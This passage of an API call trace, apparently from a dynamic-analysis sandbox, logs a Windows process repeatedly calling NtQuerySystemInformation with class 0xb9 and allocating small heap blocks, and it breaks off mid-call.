NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0225.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.842] GetProcessHeap () returned 0x27fc8db0000 [0270.842] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9b4d4f0 [0270.843] GetProcessHeap () returned 0x27fc8db0000 [0270.843] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f7d360 [0270.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.000] GetProcessHeap () returned 0x27fc8db0000 [0271.001] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd520 [0271.001] GetProcessHeap () returned 0x27fc8db0000 [0271.001] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b48f60 [0271.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] GetProcessHeap () returned 0x27fc8db0000 [0271.007] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9b4ddf0 [0271.007] GetProcessHeap () returned 0x27fc8db0000 [0271.007] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f7d2a0 [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] GetProcessHeap () returned 0x27fc8db0000 [0271.007] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbccb0 [0271.007] GetProcessHeap () returned 0x27fc8db0000 [0271.007] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b490c0 [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7e0, Length=0x50, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.234] GetProcessHeap () returned 0x27fc8db0000 [0271.234] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd520 [0271.234] GetProcessHeap () returned 0x27fc8db0000 [0271.234] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b48f80 [0271.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] GetProcessHeap () returned 0x27fc8db0000 [0271.235] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9b4d2b0 [0271.235] GetProcessHeap () returned 0x27fc8db0000 [0271.235] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f7d270 [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] GetProcessHeap () returned 0x27fc8db0000 [0271.236] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc9e0 [0271.236] GetProcessHeap () returned 0x27fc8db0000 [0271.236] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b49100 [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7e0, Length=0x50, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.257] GetProcessHeap () returned 0x27fc8db0000 [0271.257] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd700 [0271.257] GetProcessHeap () returned 0x27fc8db0000 [0271.257] RtlAllocateHeap 